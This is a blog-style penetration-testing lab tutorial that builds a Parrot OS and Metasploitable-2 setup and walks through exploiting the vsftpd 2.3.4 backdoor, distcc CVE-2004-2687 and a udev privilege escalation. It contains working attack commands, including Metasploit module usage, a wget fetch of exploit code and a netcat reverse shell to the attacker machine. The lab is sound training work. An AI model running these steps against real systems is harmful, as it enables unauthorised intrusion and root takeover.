Basic Penetration testing lab — 1

Sahil Ahamad
Sep 16, 2018 · 8 min read

I am setting up a new lab for me and thought to document the process, so anyone wants to do the same can take references from this post. I am writing this one from scratch and I will also add more parts as I move forward.

Preface

  1. Downloading all the things.
  2. Creating Virtual machines
  3. Configuring Virtual machines
  4. Reconnaissance
  5. Exploiting Common vulnerabilities — Metasploitable-2
  6. Credits

1. Downloading all the Things.

Vmware Fusion 10 — I like the paid version of the Vmware fusion 10 but you guys also use the Virtual box, which is FREE but I highly recommend Vmware fusion 10.

Parrot OS — I am using Kali Linux for a long time, I wanted to try parrot OS because it was recommended by many.

https://metasploit.help.rapid7.com/docs/metasploitable-2

Metasploitable-2 — Metasploitable-2 is vulnerable by birth, it is developed by the rapid7 for practicing on the vulnerable host. DO NOT expose this machine on any prod or sensitive server.


2. Creating Virtual Machines.

Parrot OS

Click on the “Install from disc or image” and locate your ISO and Provide default configs, you can choose the memory and size according to your need.

Provide the location of the Parrot OS.

You can use “live mode” or install. I preferred the Installed version.

Metasploitable-2

The installation process is similar to the ParrotOS.

You can provide the memory and size according to your need but keep in mind. You should keep the host machine in mind during providing custom memory and size.


3. Configuring Virtual Machines

For setting up a penetration testing lab it is important to make the connection between the machines locally. For doing that you have to use the “Bridge Connection” in the network settings.

ParrotOS

You can use according to your requirements.

Metasploitable-2


4. Reconnaissance

Startup both machines ParrotOS & Metasploitable-2.

Metasploitable-2

Login with the following credentials.

Username: msfadmin
Password: msfadmin

Local IP address for Metasploitable-2 using

ifconfig

Metasploitable-2 local IP: 192.168.10.10

ParrotOS

Login with your credentials.

default credentials for parrotOS

Username: userPassword : toor

Find the IP address for ParrotOS using the following command.

ifconfig
ParrotOS : local IP 192.168.10.5

Port scanning Metasploitable-2 using ParrotOS

nmap -A 192.168.10.10 -oX /home/ehsahil/Desktop/metaspliot2-nmap-scan.xml

the output is in XML format, let's convert it in the more organized way.

for doing this we will use a utility known as “xsltproc” — which will convert the XML into the html.

xsltproc /home/ehsahil/Desktop/metasploit2-nmap-scan.xml -o /home/ehsahil/Desktop/metasploit2-nmap-scan.xml

5. Exploiting Common Vulnerabilities.

Metasploitable — 2

1. Exploiting vsftpd 2.3.4

2. Exploiting Distcc V1 — CVE-2004–2687


1. Exploiting vsftpd 2.3.4.

Aim: Exploit VSFTPD daemon and obtain root access.

Scanning port 21 using nmap.

nmap -sV -p 21 192.168.10.10

port 21 is open and using vsftpd version 2.3.4.

Searching online for the publicly available exploit for this particular version.

vsftp 2.3.4 exploits

Exploiting manually.

ftp 192.168.10.10username: — ehsahil:)
Password — Nothing just enter

PS: smiley emoji :) is important at the end, :) it will be used to trigger the backdoor.

now, we need to listen to port 6200 because backdoor opened the port 6200

nc -vvn 192.168.10.10 6200

Exploiting Using Metasploitable-2.

Start Metasploitable-2 by using the msfconsole command.

msfconsole

Metasploit Commands.

search vsftpduse exploit/Unix/ftp/vsftpd_234_backdoorshow optionsset RHOST 192.168.10.10exploit

Background: This specific version of the vsftpd was infected with a backdoor by an intruder, the developers quickly responded by deleting the backdoor from the code. the users who upgraded to this version were vulnerable to the issue.

the backdoor is initiated when someone adds :) (smiley face) in the username during ftp handshake. then backdoor sets up a bind shell listener on port 6200.

Vulnerable Source code: http://pastebin.com/AetT9sS5

Detailed Source code review:


2. Exploiting Vulnerable DISTCC — CVE-2004–2687

Aim: Getting root access on the machine.

DISTCC V1 is known vulnerable application running on Metasploitable-2 but it is interesting because we have to escalate normal user to root using “Privilege Escalation”

Searching about distcc on online

distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project’s compilation time.

distcc running on port 3632

Running nmap against port — 3632

nmap -sV -p 3632 192.168.10.10

Searching for the public exploit for distccd v1

Vulnerable to: CVE-2004–2687

Exploit publicly available. https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

Exploiting using Metasploit

msfconsole

metasploit commands.

search distccuse exploit/unix/distcc_execshow optionsset RHOST 192.168.10.10exploit

Currently, uid=1 and we cannot cat /etc/shadow , This indicated that we don't have root privileges yet.

We need to leverage another vulnerability available in the installed components

for doing that we need to apply recon process to know more about the system.

Seeing all the shells available to us.

cat /etc/shells

GCC — Used for compiling exploits

which gcc

WGET — Used to download the exploit in the vulnerable machine

which wget

lets, see all the running processes.

ps aux

from the above processes, we can move forward to see publicly available exploits.

but, as we are using Metasploitable-2, we already know the vulnerable component, we will use that.

The vulnerable component is “udev”, let's grep for it from the running processes.

Searching for exploits on searchsploit

searchsploit udev

We are interested in the exploit for “local privilege Escalation(2) — /exploits/linux/local/8572.c”

cat /usr/share/exploitdb/exploits/linux/local/8572.c

Exploit usage.

Steps for escalating daemon to root.

  1. Starting local Apache server — apache2
service apache2 start

2. Coping the exploit into the apache server public directory

Exploit directory — /usr/share/exploitdb/exploits/linux/local/

Apache servers public directory: /var/www/html

sudo /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/ehsahil.c

3. Copying the exploit file into the vulnerable machine using wget.

ParrotOS IP: 192.168.10.5wget 192.168.10.5/ehsahil.c

our exploit code “ehsahil.c” has been copied to /tmp directory.

4. Creating a run file in /tmp directory — required by exploit


touch run #creating run file required by the exploit
#bash script to get the reverse shell.
echo '#!/bin/sh' > run
echo '/bin/netcat -e /bin/bash 192.168.10.5 5555' >> run

5. Compiling our exploit code.

gcc ehsahil.c -o ehsahil

6. listening on post 5555

nc -lvnp 5555

7. PID of the udev Netlink socket

cat /proc/net/netlink

PID of the udev Netlink socket = 2718

8. Executable permission to Compiled Exploit.

chmod 755 ehsahil

9. Exploit.

./ehsahil <Netlink-Socket-address>

./ehsahil 2718

Reverse shell obtained.


I will post more metasploitable2 common exploits as I practice them.

Credits

RWB NetSec

Feedback? hit me on twitter @ehsahil


Until Next time.

Sahil Ahamad

Written by

Security Engineer @zomato | Information Security Researcher | Bug Bounty Hunter | https://hackerone.com/ehsahil